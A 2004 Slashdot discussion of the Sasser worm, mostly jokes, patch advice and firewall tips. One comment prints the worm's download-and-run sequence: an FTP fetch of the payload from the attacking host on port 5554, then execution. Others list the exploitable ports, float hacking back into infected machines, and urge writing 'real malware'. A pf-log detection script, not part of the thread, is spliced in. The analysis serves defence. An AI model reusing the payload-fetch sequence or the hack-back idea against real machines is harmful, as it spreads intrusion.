
New Windows Worm on the Loose 622

Posted by michael
from the batten-down-your-ports dept.
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
  • ah... (Score:5, Funny)

    by Anonymous Coward on Saturday May 01, 2004 @12:41PM (#9028359)
    the luxury of being behind a nat box with all ports off and not having to deal with such nonsense
    • Re:ah... (Score:5, Funny)

      by Interruach (680347) on Saturday May 01, 2004 @12:48PM (#9028414) Journal
      ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

      -- I see your nat box and raise you a proxy server.
    • Re:ah... (Score:5, Insightful)

      by Anonymous Coward on Saturday May 01, 2004 @12:50PM (#9028437)
      the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

      Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

  • by craXORjack (726120) on Saturday May 01, 2004 @12:42PM (#9028367)
    Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

    What is this 'Windows Update' of which you speak?

    • by temojen (678985) on Saturday May 01, 2004 @12:47PM (#9028405) Journal
      I believe it's a kludgy Microsoft variant of

      "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

      except that it requires you to reboot several times and repeatedly interact with it.
      • Re:I Use X Windows (Score:5, Insightful)

        by SpectreGadget (465507) <jim@harryfamiDEGASly.com minus painter> on Saturday May 01, 2004 @01:43PM (#9028858) Homepage
        oh yes:

        "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

        isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.
      • Re:I Use X Windows (Score:3, Interesting)

        by reallocate (142797)
        I've never had Windows Update break a machine.

        All that "emerge" stuff breaks Gentoo, sooner or later, every time I've tried it.
    • by gnu-generation-one (717590) on Saturday May 01, 2004 @01:22PM (#9028700) Homepage
      "What is this 'Windows Update' of which you speak?"

      Full text, in case of slashdotting:
      "
      Thank you for your interest in Windows Update

      Windows Update is the online extension of Windows that helps you get the most out of your computer.

      You must be running a Microsoft Windows operating system in order to use Windows Update."
    • Re:I Use X Windows (Score:3, Insightful)

      by bkhl (189311)
      No, you're not:

      "The X Consortium requests that the following names be used when referring to this software:

      X
      X Window System
      X Version 11
      X Window System, Version 11
      X11

      X Window System is a trademark of X Consortium, Inc. "
  • Mutex Trapping (Score:5, Interesting)

    by Mr. Darl McBride (704524) on Saturday May 01, 2004 @12:42PM (#9028369)
    About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

    Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

    This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

    • For that matter, how hard would it be to restrict which programs are allowed to create files with runnable extensions without prompting?

      Why can't we have something that protects the registry and pops up whenever something wants to go into software/microsoft/windows/run, /runonce, runonceex, etc? 3/4 of the stuff that goes in there, I end up ripping out later. It's dumb that it's so easy for programs to install things there.

      • Re:Mutex Trapping (Score:5, Informative)

        by Anonymous Coward on Saturday May 01, 2004 @12:49PM (#9028427)
        You can set permissions in the registry per key.

        Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run
      • Re:Mutex Trapping (Score:5, Informative)

        by kyhwana (18093) <kyhwana@SELL-YOUR-SOUL.kyhwana.org> on Saturday May 01, 2004 @01:00PM (#9028519) Homepage
        Err, Startup Monitor [mlin.net] does just that.
        Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
      • Re:Mutex Trapping (Score:5, Informative)

        by Verteiron (224042) * on Saturday May 01, 2004 @01:03PM (#9028546) Homepage
        It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot [spybotsd.info] TeaTimer. It's available with the newest release candidate. You can download that here [net-integration.net] (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
    • Re:Mutex Trapping (Score:5, Informative)

      by The Raven (30575) * on Saturday May 01, 2004 @12:48PM (#9028412) Homepage
      Toolbars and similar items would not be prevented by blocking mutexes as far as I know, because they don't create one. They run under the IE process.

      However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
    • Re:Mutex Trapping (Score:3, Informative)

      by Joe U (443617)
      Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

      Imagine running something complex like a database server. Dialog box fun.

      The virus writers will just use something else, like a file, if people tracked by mutex.
    • Re:Mutex Trapping (Score:3, Insightful)

      by SchnauzerGuy (647948)
      Creating a mutex at startup is by no means universal, and in fact, I doubt that it's very common at all.

      If there was a mutex checker/blocker program developed, you would just see worm authors switch to a different method of determining if their worm was already running, or randomize the mutex name.
  • Huh? (Score:5, Funny)

    by grub (11606) <slashdot@grub.net> on Saturday May 01, 2004 @12:43PM (#9028371) Homepage Journal

    A new worm?
    May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)
    Oh, there it is.
  • Removal Instructions (Score:5, Informative)

    by modifried (605582) on Saturday May 01, 2004 @12:44PM (#9028381) Homepage
    For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

    http://www.microsoft.com/security/incident/sasser.asp [microsoft.com]
  • by Quazion (237706) on Saturday May 01, 2004 @12:45PM (#9028382) Homepage
    At least for me as the local consumer support guy.

    Thanks Microsoft.
  • HAHA (Score:5, Funny)

    by D-Cypell (446534) on Saturday May 01, 2004 @12:45PM (#9028386)
    A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

    The ad server must be based on Microsoft's new Irony.NET framework!
    • Re:HAHA (Score:5, Insightful)

      by yulek (202118) on Saturday May 01, 2004 @01:25PM (#9028719) Homepage Journal
      A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

      i realize you were mostly joking, but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it. and since current viruses are not true malware, the fact that the machine is infected doesn't even matter to the cheap contractor admin "running" the box. as someone mentioned in another story's comment, it's time to make some REAL malware and wake these ijits up.
      • Re:HAHA (Score:5, Insightful)

        by Lothsahn (221388) <Lothsahn@@@SPAM_ ... u_bastardsyahocm> on Saturday May 01, 2004 @02:06PM (#9029033)
        Actually, current viruses are real malware, especially the ones that try to shut down virus scanners.

        They cause the computer to run really slow and screw things up, including networking settings, killing IE, destroying the cryptography service (so that you can't get updates) and the ability to repair the TCP/IP layer.

        When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).

        I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of its normal speed, that's enough to take down almost any operation.

      • Re:HAHA (Score:5, Funny)

        by Anonymous Coward on Saturday May 01, 2004 @02:40PM (#9029261)
        but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it.

        And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.
  • by squall14716 (734306) on Saturday May 01, 2004 @12:47PM (#9028401)
    Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.
  • by Anonymous Coward on Saturday May 01, 2004 @12:49PM (#9028421)
    No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.
  • Dang... (Score:5, Funny)

    by kennylives (27274) on Saturday May 01, 2004 @12:49PM (#9028428) Journal
    I have a Mac, you insensitive clod...
  • by TheUnFounded (731123) on Saturday May 01, 2004 @12:50PM (#9028435)
    You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...
    • by Unknown Relic (544714) on Saturday May 01, 2004 @01:25PM (#9028723) Homepage
      Is that reduced timeline maybe an example of what this /. article [slashdot.org] from a couple months ago was talking about? Essentially it stated that a lot of the new worms are actually being caused by the reverse engineering of patches to easily find exploits. Some machines will of course be patched, but as we all know, a huge number of machines will remain unpatched and vulnerable for months to come. If this is the case, Microsoft can hardly be faulted for getting the patch out only a few days before the exploit, since it's the patch itself that potentially prompted its creation. The really interesting thing is that if this is the case and Microsoft is actually increasing their security efforts and releasing more patches, we could actually see more worms released targeting unpatched systems. For them, this really isn't a good situation to be in - the more they do correct problems with their operating systems, the more exploits hit the unpatched machines, making it look like their enhanced focus on security is a joke.
    • Came out the 13th if I recall correctly. 17 Days is still a really fast turn around though.
    • by mrneutron (61365) *
      Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).
  • by Anonymous Coward on Saturday May 01, 2004 @12:51PM (#9028441)
    In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!
  • by Brian Dennehy (698379) on Saturday May 01, 2004 @12:54PM (#9028466) Homepage
    I'm impressed that they got the headline right!
  • by gnuman99 (746007) on Saturday May 01, 2004 @12:55PM (#9028479)
    Same old news about another worm. Nothing to see here, move along.

    Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting on keeping all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?

    If MS was at all serious about security, they would have all ports closed by default. Or at least have the possibility of closing them down during install.

  • How it works (Score:5, Informative)

    by mrneutron (61365) * on Saturday May 01, 2004 @12:57PM (#9028493)
    It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

    It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):

    open XXX.XXX.XXX.XXX 5554
    anonymous
    user
    bin
    get XXXXX_up.exe
    bye
    XXXXX_up.exe

    If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

    The IP addresses generated by the worm are distributed as follows:

    50% are completely random
    25% have the same first octet as the IP address of the infected host
    25% have the same first and second octet as the IP address of the infected host.

    The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely usable.

    See:

    • http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html
  • Dammit... (Score:4, Interesting)

    by Saint Aardvark (159009) * on Saturday May 01, 2004 @12:58PM (#9028503) Homepage Journal
    I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.
    • Re:Dammit... (Score:5, Interesting)

      by Nonesuch (90847) <nonesuch@@@msg...net> on Saturday May 01, 2004 @02:40PM (#9029259) Homepage Journal
      I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...
      LaBrea runs on FreeBSD too.

      I use the "redirect" feature of the packet filter to do the equivalent of proxy transparency on ports 135,139,445,4444,9996 to local ports with a local listener.

      The Sasser worm starts 128 scanning threads to pseudo-random destinations, and on a fast machine can really pump out the packets. If you give it something to talk to on ports 445 and 9996, that considerably slows the scanning behavior.

  • by brendanoconnor (584099) on Saturday May 01, 2004 @01:00PM (#9028520)
    Currently I'm running win2k on my main desktop fully patched, so this little problem doesn't really hurt me per se. With all the patches in place, my computer does some of the following things.

    1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to mozilla. I thank MS for this cause moz. owns.

    2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. It's not the color scheme either, I tried MS default and it still didn't work.

    3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.

    All in all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unusable. If I wasn't so damn lazy, this would have been done sooner.

    Brendan
  • by nazsco (695026) on Saturday May 01, 2004 @01:02PM (#9028535) Journal
    The worm seems to install an ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554 reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

    I consider it a public service. Maybe you can even deduct the bandwidth for the upload from your tax.
  • by C0rinthian (770164) on Saturday May 01, 2004 @01:04PM (#9028554)
    I REALLY hate working dial-up tech support.
    (ring)
    sigh....
  • by R_V_Winkle (186128) on Saturday May 01, 2004 @01:07PM (#9028578)
    In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

    Sasser generates traffic on TCP ports 445, 5554 and 9996.

    The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

    http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
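As an added example (not from this thread or from any of the vendor write-ups it links), the script below applies the infection sequence from the "How it works" post above and the port list in this post to pf log lines of the form grub quoted earlier: a source is labelled by which of TCP 445, 9996 and 5554 it touched, and in what combination. The log lines, addresses and the three-target threshold are constructed assumptions.

```python
"""Flag Sasser-style probe patterns in pf firewall log lines (added example)."""
import re
from collections import defaultdict

# Ports named in the thread: TCP 445 is the LSASS entry point the worm exploits,
# TCP 9996 is the shell the exploit opens on the victim, and TCP 5554 is the FTP
# server on the attacking host from which the victim fetches the worm body.
PORT_LSASS, PORT_SHELL, PORT_FTP = 445, 9996, 5554

# Matches the tcpdump-style pf log line quoted in the thread, e.g.
# "May 01 07:59:49.306654 rule 0/0(match): block in on dc0: A:1031 > B:445: S ..."
PF_SYN = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2})\.\d+ rule \S+\(match\): "
    r"(?P<action>block|pass) (?P<dir>in|out) on (?P<iface>\w+): "
    r"(?P<src>\d+(?:\.\d+){3}):(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3}):(?P<dport>\d+): S "
)

# Constructed sample log (documentation address ranges, not real hosts).
SAMPLE_LOG = """\
May 01 07:59:49.306654 rule 0/0(match): block in on dc0: 203.0.113.9:1031 > 192.0.2.10:445: S 2881286568:2881286568(0) win 32640 (DF)
May 01 07:59:49.412000 rule 0/0(match): block in on dc0: 203.0.113.9:1032 > 192.0.2.11:445: S 2881286569:2881286569(0) win 32640 (DF)
May 01 07:59:49.520111 rule 0/0(match): block in on dc0: 203.0.113.9:1033 > 192.0.2.12:445: S 2881286570:2881286570(0) win 32640 (DF)
May 01 07:59:50.001222 rule 0/0(match): block in on dc0: 203.0.113.9:1034 > 192.0.2.12:9996: S 2881286571:2881286571(0) win 32640 (DF)
May 01 08:00:02.777333 rule 2/0(match): pass out on dc0: 192.0.2.12:1044 > 203.0.113.9:5554: S 1029384756:1029384756(0) win 16384 (DF)
May 01 08:00:05.100000 rule 0/0(match): block in on dc0: 198.51.100.4:2231 > 192.0.2.10:445: S 445566778:445566778(0) win 65535 (DF)
May 01 08:00:06.200000 rule 1/0(match): pass in on dc0: 198.51.100.8:40001 > 192.0.2.10:80: S 99887766:99887766(0) win 5840 (DF)
"""


def parse_syn(line):
    """Return (src, dst, dport) for a logged TCP SYN, or None for any other line."""
    m = PF_SYN.match(line)
    if m is None:
        return None
    return m.group("src"), m.group("dst"), int(m.group("dport"))


def profile_sources(lines):
    """Map each source IP to {dport: set of destinations} for the three Sasser ports."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in lines:
        parsed = parse_syn(line)
        if parsed is None:
            continue
        src, dst, dport = parsed
        if dport in (PORT_LSASS, PORT_SHELL, PORT_FTP):
            hits[src][dport].add(dst)
    return hits


def classify(hits, min_targets=3):
    """Label sources whose SYNs match a stage of the infection sequence described above.

    scanning       - 445 probed on at least min_targets distinct hosts (the thread sweep)
    exploit-follow - 445 and then 9996 on the same host (talking to the opened shell)
    payload-fetch  - a SYN to 5554 (the FTP download; if the source is a local host,
                     that host has most likely just been exploited)
    A lone 445 probe is left unlabelled: on its own it is indistinguishable from the
    ordinary background noise the thread complains about.
    """
    verdicts = {}
    for src, by_port in hits.items():
        labels = []
        lsass_targets = by_port.get(PORT_LSASS, set())
        if len(lsass_targets) >= min_targets:
            labels.append("scanning")
        if lsass_targets & by_port.get(PORT_SHELL, set()):
            labels.append("exploit-follow")
        if by_port.get(PORT_FTP):
            labels.append("payload-fetch")
        if labels:
            verdicts[src] = labels
    return verdicts


if __name__ == "__main__":
    for src, labels in classify(profile_sources(SAMPLE_LOG.splitlines())).items():
        print(f"{src:15} {', '.join(labels)}")
```

On the constructed log this reports 203.0.113.9 as scanning plus exploit-follow and 192.0.2.12 (which then dialled out to 5554) as payload-fetch; the single 445 probe from 198.51.100.4 stays unlabelled.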
  • by nazsco (695026) on Saturday May 01, 2004 @01:12PM (#9028616) Journal
    after reading this on the /. front page, i ran the windows update, which i hadn't visited for more than a year...

    and after some time, a window pops up with the text:
    "The software you are installing has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
    "This software will *not be installed*. Contact your system administrator."

    Ok, so i contact myself, and wonder what the hell?!?

    I just gave M$ a lot of information about the operating system that i'm running... they wrote the friggin' thing, and even so, they don't know what will run on it, or what will pass their own crap compatibility verification!

    but well, that's it... i just click "OK" --the only button-- and see the same window appear 3 more times... and blissfully keep my ignorance of what's going on with the installation.
  • That's funny. (Score:3, Interesting)

    by LordK3nn3th (715352) on Saturday May 01, 2004 @01:15PM (#9028642)
    Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?

    I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
  • by 6Yankee (597075) on Saturday May 01, 2004 @01:15PM (#9028643)

    How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

    Of course, then came the comments... :-)

  • by lazy_arabica (750133) on Saturday May 01, 2004 @01:17PM (#9028662) Homepage
    ... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)

    Linux_Zealot says : 5 Insightful - I am using Linux now !
    M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
    security_Teacher : 5 Insightful - Of course, no one should run anything as root but critical administration tasks, and a firewall is essential.
    n00b : -1 Troll - Windows Sucks !!!

    Well... That's just a little... repetitive ;-)
  • by donkeyoverlord (688535) on Saturday May 01, 2004 @01:21PM (#9028693) Homepage
    This is like a freaking death sentence considering everyone in town thinks that this is their own free computer tech support hot line.
  • This totally sucks. (Score:5, Interesting)

    by mark-t (151149) <markt@ l y n x.bc.ca> on Saturday May 01, 2004 @01:27PM (#9028736) Journal
    I was never in any danger of being infected by this worm, but about 3 days ago, I noticed I was getting almost a steady stream of traffic on my lan when nobody was using any computers... A quick check with ethereal showed that it was all port 445 stuff, and I was getting as many as 10 packets every second coming from various IP addresses.

    So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.

    Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case because in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against access from IP addresses other than those on my LAN. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.

    Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.

  • by rspress (623984) on Saturday May 01, 2004 @01:29PM (#9028751) Homepage
    I use the best anti virus on the market! It is called a Mac! Actually I have both a Mac and a WindowsXP Pro box with a router and firewall. Just to keep things clean my windows machine is NEVER used for checking mail. All mail is handled through the Mac. If I have a need to send mail via the PC or need to check it from the PC for some reason then Eudora Pro is used. The Outlook variants are the biggest viri available for the PC....with explorer coming in a close second.
  • by BJZQ8 (644168) on Saturday May 01, 2004 @01:41PM (#9028837) Homepage Journal
    I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...
  • by chrysalis (50680) on Saturday May 01, 2004 @01:49PM (#9028907) Homepage
    Here is an introduction to virus [00f.net] for non-windows users.
  • by imnoteddy (568836) on Saturday May 01, 2004 @02:22PM (#9029138)
    "Ha Ha!"
    Nelson, various Simpsons episodes
  • normally my home firewall (linux of course) logs about 100k bytes in messages per day (i have iptables log all dropped packets). Today alone it's over 50 megs. Normally i have logrotate.conf set for weekly rotations, but i switched it to daily, and made sure my var partition has more than enough room (3 gigs free, so i think i am ok).
  • by sir_cello (634395) on Saturday May 01, 2004 @03:45PM (#9029685)

    Using Symantec AV, I LiveUpdate'd signatures, only to find that it declared System32/w32sup.exe as a trojan and quarantined it.

  • by gorfie (700458) on Saturday May 01, 2004 @04:16PM (#9029859)
    Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

    Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".

    Running something other than Windows is not a good reason to ignore security.
  • Grounded (Score:4, Interesting)

    by krray (605395) * on Saturday May 01, 2004 @04:25PM (#9029924)
    And in other news ... Delta flights grounded today due to "a computer glitch"

    I have to wonder...
